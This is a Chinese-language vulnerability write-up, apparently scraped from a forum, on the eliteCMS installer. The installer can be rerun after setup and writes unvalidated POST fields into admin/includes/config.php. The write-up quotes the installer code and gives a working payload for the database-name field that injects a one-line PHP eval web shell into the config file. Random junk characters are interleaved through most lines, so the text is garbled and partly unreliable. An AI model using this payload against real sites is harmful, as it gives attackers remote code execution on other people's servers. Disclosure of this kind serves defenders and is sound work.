eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
. W" l. @- [. @, ~. c" y7 _
' t1 D6 E5 x4 n% D另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php: N1 \ Q) X* S; r
我们来看代码:( {2 F) D# w$ t2 ^. \( P: ]9 f s
8 d; H6 _4 Y& c! s% L...( x! h9 K( a9 F8 f9 V$ |- {% t
elseif ($_GET['step'] == "4") {
. ]: }5 V. u, J: M! c9 ]& O $file = "../admin/includes/config.php";( T1 A( z0 e5 H# M: ?" e, z
$write = "<?php\n";
/ R, q7 s/ K \% {% ~+ R $write .= "/**\n";/ @# ^/ m M1 L- j
$write .= "*\n";* X- C. b6 c# c3 _/ e r( f
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
7 g) s4 D9 [9 o, z...略...9 J6 ?; ^" C. \4 l/ w
$write .= "*\n";
/ _$ U3 I# `4 F9 } $write .= "*/\n";, Y6 @. [2 w/ H2 \5 [
$write .= "\n";$ ~) Q. Z3 K$ {" H! O
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";' |* R, t4 { P4 c% {/ w
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
5 u0 A1 q. U7 \6 ]6 M $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
! c$ N' i% B' `: E2 ~ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
& @: U' c; G3 y, D6 e' E) d v( ]. w $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";9 ^7 f* R, o- x& ?' v
$write .= "if (!\$connection) {\n";
7 m4 ?4 C# m" l2 w, S. V $write .= " die(\"Database connection failed\" .mysql_error());\n";) E' }* C; h3 A; ]& Y; V
$write .= " \n";' j$ q( R; P! U- p- N
$write .= "} \n";
# Z" R2 Q _; @* I5 f6 W0 c4 O $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";( h8 `* @8 x+ P) y, b
$write .= "if (!\$db_select) {\n";
! a) K! d1 k8 g4 c) ]4 X% h7 p1 d $write .= " die(\"Database select failed\" .mysql_error());\n";' B& }" M0 t3 e% Q8 X0 y5 W
$write .= " \n";
. S, |. ~! H! J3 M $write .= "} \n";
" p5 G/ m: Q+ {, T/ h $write .= "?>\n";
# K0 J4 c8 |; e6 F+ u' } ( }) I' G9 T) F$ P& u
$writer = fopen($file, 'w');* X( X. ?8 ]! k" b
...3 n8 R0 T* L+ u! Y8 @$ X1 l: ?
' r- O4 o/ _5 w% a- F, Z; H
在看代码:
, k# J: p5 ]9 S% g% N ; }' H. e' u; K1 g1 U, I5 Q' K
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
4 f( J0 Q) @4 i0 T2 H$_SESSION['DB_NAME'] = $_POST['DB_NAME'];7 A5 Z9 |% [5 V( P, L
$_SESSION['DB_USER'] = $_POST['DB_USER'];
5 i7 p, p! h8 G1 `" P$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
3 s. l9 C1 A5 ]; I x( k
' l' `% e# t: ^' t6 a( A9 A取值未作任何验证+ `$ C2 B" p* T9 E' g. Z+ \4 p/ C- A
如果将数据库名POST数据:
. O6 `0 Q- i1 L 2 S4 x+ E( H. {
"?><?php eval($_POST[c]);?><?php
2 u1 X4 y$ Q0 P 3 u, C' i& [/ I2 a
将导致一句话后门写入/admin/includes/config.php: ]! _( g) Z/ d% i/ R% d+ A
|